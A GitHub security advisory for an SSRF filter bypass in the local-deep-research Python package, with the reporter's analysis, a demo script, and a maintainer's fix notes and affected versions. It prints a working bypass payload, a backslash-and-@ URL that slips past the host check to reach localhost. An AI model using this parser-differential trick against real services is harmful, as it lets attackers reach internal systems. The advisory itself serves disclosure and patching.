GHSA-G23J-2VWM-5C25

Vulnerability from github – Published: 2026-05-28 19:18 – Updated: 2026-05-28 19:18
VLAI
Summary
local-deep-research has an SSRF bypass in `safe_get`
Details

Summary

The URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.

Details

The current project uses validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.

QQ20260430-212334-30-1

However, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in safe_get, validate_url is first used to perform an SSRF check, and then requests.get is used to send the actual request.

QQ20260430-212431-30-2

The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:

  • urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as 1.1.1.1 (public)
  • requests treats \ as a path character, connecting to 127.0.0.1 (internal)

Below is a test code I wrote following the code.

#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""

from __future__ import annotations

import importlib.util
import enum
import sys
import types
from pathlib import Path

# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
    r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)

# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
    class _CompatStrEnum(str, enum.Enum):
        pass

    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]


def _load_safe_get():
    """Load safe_get directly from file, bypassing package __init__ imports."""
    ldr_pkg_name = "local_deep_research"
    security_pkg_name = "local_deep_research.security"

    # Build lightweight package modules so relative imports in safe_requests.py
    # resolve without executing package __init__.py files.
    if ldr_pkg_name not in sys.modules:
        ldr_pkg = types.ModuleType(ldr_pkg_name)
        ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")]  # type: ignore[attr-defined]
        sys.modules[ldr_pkg_name] = ldr_pkg

    if security_pkg_name not in sys.modules:
        security_pkg = types.ModuleType(security_pkg_name)
        security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")]  # type: ignore[attr-defined]
        sys.modules[security_pkg_name] = security_pkg

    module_name = "local_deep_research.security.safe_requests"
    module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"

    spec = importlib.util.spec_from_file_location(module_name, module_path)
    if spec is None or spec.loader is None:
        raise ImportError(f"Cannot load module from {module_path}")

    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module.safe_get


safe_get = _load_safe_get()


def main() -> None:
    # Hardcoded URL for demonstration.
    url = "http://127.0.0.1:6666"
    # url = "http://127.0.0.1:6666\@1.1.1.1"

    safe_get(url, timeout=15)


if __name__ == "__main__":
    main()

When an attacker uses http://127.0.0.1:6666/, the existing detection logic can detect that this is an internal network address and block it.

QQ20260430-212723-30-3

However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to http://127.0.0.1:6666, bypassing the detection and achieving an SSRF attack.

QQ20260430-212833-30-4

PoC

http://127.0.0.1:6666\@1.1.1.1

Impact

SSRF


Maintainer note (2026-05-15)

Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation spans four PRs, all merged to main and shipped in v1.6.10:

#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential bypass: - New RFC_FORBIDDEN_URL_CHARS_RE in security/ssrf_validator.py rejects URLs containing backslash, ASCII control bytes, or whitespace — RFC 3986 forbids these and their presence signals a parser-differential attempt. - Host extraction switched from urllib.parse.urlparse(url).hostname to urllib3.util.parse_url(url).host. urllib3 is the parser requests uses internally, so the validator and the HTTP client now agree on the destination by construction — closing the \@ divergence that drove the PoC. - Same two-layer defence applied to NotificationURLValidator.validate_service_url. - 53 new tests across test_ssrf_validator.py, test_notification_validator.py, test_safe_requests.py, and test_ssrf_redirect_bypass.py, including the advisory PoC http://127.0.0.1:6666\@1.1.1.1 and the post-prepare canonical form http://127.0.0.1:6666/%5C@1.1.1.1.

#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.

#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.

#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16 6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments, but cloud metadata IPs remain blocked regardless.

Affected versions

  • The specific parser-differential bypass described above exists from v1.3.0 (when validate_url was first introduced) through v1.6.9. The validator used urlparse(url).hostname for that entire span.
  • Versions before v1.3.0 had no SSRF validator at all — requests went directly to requests.get() without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.

In both cases the remediation is the same: upgrade to v1.6.10 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "local-deep-research"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-28T19:18:34Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.\n\n### Details\nThe current project uses `validate_url` to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.\n\n\u003cimg width=\"1173\" height=\"1107\" alt=\"QQ20260430-212334-30-1\" src=\"https://github.com/user-attachments/assets/52b356aa-9ad3-4b1d-a472-39a2ada3ea23\" /\u003e\n\nHowever, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in `safe_get`, `validate_url` is first used to perform an SSRF check, and then `requests.get` is used to send the actual request.\n\n\u003cimg width=\"1164\" height=\"1089\" alt=\"QQ20260430-212431-30-2\" src=\"https://github.com/user-attachments/assets/f3decb16-4daa-49e0-861c-273a913487a0\" /\u003e\n\nThe core issue: urlparse() and requests disagree on which host a URL like `http://127.0.0.1:6666\\@1.1.1.1` points to:\n\n- urlparse() treats \\ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public)\n- requests treats \\ as a path character, connecting to `127.0.0.1` (internal)\n\nBelow is a test code I wrote following the code.\n```\n#!/usr/bin/env python3\n\"\"\"Standalone demo: import project via absolute path and call safe_get.\"\"\"\n\nfrom __future__ import annotations\n\nimport importlib.util\nimport enum\nimport sys\nimport types\nfrom pathlib import Path\n\n# Hardcoded absolute path to the project\u0027s \"src\" directory.\nSRC_ROOT = Path(\n    r\"d:\\BaiduNetdiskDownload\\local-deep-research-main\\local-deep-research-main\\src\"\n)\n\n# Python 3.10 compatibility:\n# project constants import StrEnum (available in Python 3.11+).\nif not hasattr(enum, \"StrEnum\"):\n    class _CompatStrEnum(str, enum.Enum):\n        pass\n\n    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]\n\n\ndef _load_safe_get():\n    \"\"\"Load safe_get directly from file, bypassing package __init__ imports.\"\"\"\n    ldr_pkg_name = \"local_deep_research\"\n    security_pkg_name = \"local_deep_research.security\"\n\n    # Build lightweight package modules so relative imports in safe_requests.py\n    # resolve without executing package __init__.py files.\n    if ldr_pkg_name not in sys.modules:\n        ldr_pkg = types.ModuleType(ldr_pkg_name)\n        ldr_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\")]  # type: ignore[attr-defined]\n        sys.modules[ldr_pkg_name] = ldr_pkg\n\n    if security_pkg_name not in sys.modules:\n        security_pkg = types.ModuleType(security_pkg_name)\n        security_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\" / \"security\")]  # type: ignore[attr-defined]\n        sys.modules[security_pkg_name] = security_pkg\n\n    module_name = \"local_deep_research.security.safe_requests\"\n    module_path = SRC_ROOT / \"local_deep_research\" / \"security\" / \"safe_requests.py\"\n\n    spec = importlib.util.spec_from_file_location(module_name, module_path)\n    if spec is None or spec.loader is None:\n        raise ImportError(f\"Cannot load module from {module_path}\")\n\n    module = importlib.util.module_from_spec(spec)\n    sys.modules[module_name] = module\n    spec.loader.exec_module(module)\n    return module.safe_get\n\n\nsafe_get = _load_safe_get()\n\n\ndef main() -\u003e None:\n    # Hardcoded URL for demonstration.\n    url = \"http://127.0.0.1:6666\"\n    # url = \"http://127.0.0.1:6666\\@1.1.1.1\"\n\n    safe_get(url, timeout=15)\n\n\nif __name__ == \"__main__\":\n    main()\n```\nWhen an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it.\n\n\u003cimg width=\"1694\" height=\"503\" alt=\"QQ20260430-212723-30-3\" src=\"https://github.com/user-attachments/assets/366f684d-9191-4acb-b6a2-b2c3c54f0223\" /\u003e\n\nHowever, when an attacker uses `http://127.0.0.1:6666\\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack.\n\n\u003cimg width=\"2424\" height=\"477\" alt=\"QQ20260430-212833-30-4\" src=\"https://github.com/user-attachments/assets/bd175e34-d833-44c5-981b-59cfad3406c3\" /\u003e\n\n### PoC\n```\nhttp://127.0.0.1:6666\\@1.1.1.1\n```\n\n### Impact\nSSRF\n\n\n\n---\n\n## Maintainer note (2026-05-15)\n\nThanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation\nspans four PRs, all merged to `main` and shipped in **v1.6.10**:\n\n**#3873** (merged 2026-05-08) \u2014 the load-bearing fix for the parser-differential\nbypass:\n- New `RFC_FORBIDDEN_URL_CHARS_RE` in `security/ssrf_validator.py` rejects\n  URLs containing backslash, ASCII control bytes, or whitespace \u2014 RFC 3986\n  forbids these and their presence signals a parser-differential attempt.\n- Host extraction switched from `urllib.parse.urlparse(url).hostname` to\n  `urllib3.util.parse_url(url).host`. `urllib3` is the parser `requests`\n  uses internally, so the validator and the HTTP client now agree on the\n  destination by construction \u2014 closing the `\\@` divergence that drove the\n  PoC.\n- Same two-layer defence applied to `NotificationURLValidator.validate_service_url`.\n- 53 new tests across `test_ssrf_validator.py`, `test_notification_validator.py`,\n  `test_safe_requests.py`, and `test_ssrf_redirect_bypass.py`, including the\n  advisory PoC `http://127.0.0.1:6666\\@1.1.1.1` and the post-prepare canonical\n  form `http://127.0.0.1:6666/%5C@1.1.1.1`.\n\n**#3882** (merged 2026-05-08) \u2014 hardens the metadata-IP block and redacts\nuserinfo from log output so rejected URLs don\u0027t leak credentials to logs.\n\n**#3889** (merged 2026-05-09) \u2014 locks in real-world URL fixtures and behavior\ninvariants from #3873/#3882 as regression tests.\n\n**#3932** (merged 2026-05-10) \u2014 blocks IPv6 transition prefixes (`2002::/16`\n6to4, `64:ff9b::/96` NAT64, `2001::/32` Teredo, `100::/64` discard) so private\nIPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an\noperator opt-in (`LDR_SECURITY_ALLOW_NAT64=true`) for IPv6-only deployments,\nbut cloud metadata IPs remain blocked regardless.\n\n### Affected versions\n\n- **The specific parser-differential bypass** described above exists from\n  **v1.3.0** (when `validate_url` was first introduced) through **v1.6.9**.\n  The validator used `urlparse(url).hostname` for that entire span.\n- **Versions before v1.3.0** had no SSRF validator at all \u2014 requests went\n  directly to `requests.get()` without any host check. Those versions are\n  vulnerable to SSRF via this URL and any other internal address; the\n  parser-differential trick is unnecessary.\n\nIn both cases the remediation is the same: **upgrade to v1.6.10 or later.**",
  "id": "GHSA-g23j-2vwm-5c25",
  "modified": "2026-05-28T19:18:35Z",
  "published": "2026-05-28T19:18:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-g23j-2vwm-5c25"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/LearningCircuit/local-deep-research"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/releases/tag/v1.6.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "local-deep-research has an SSRF bypass in `safe_get`"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…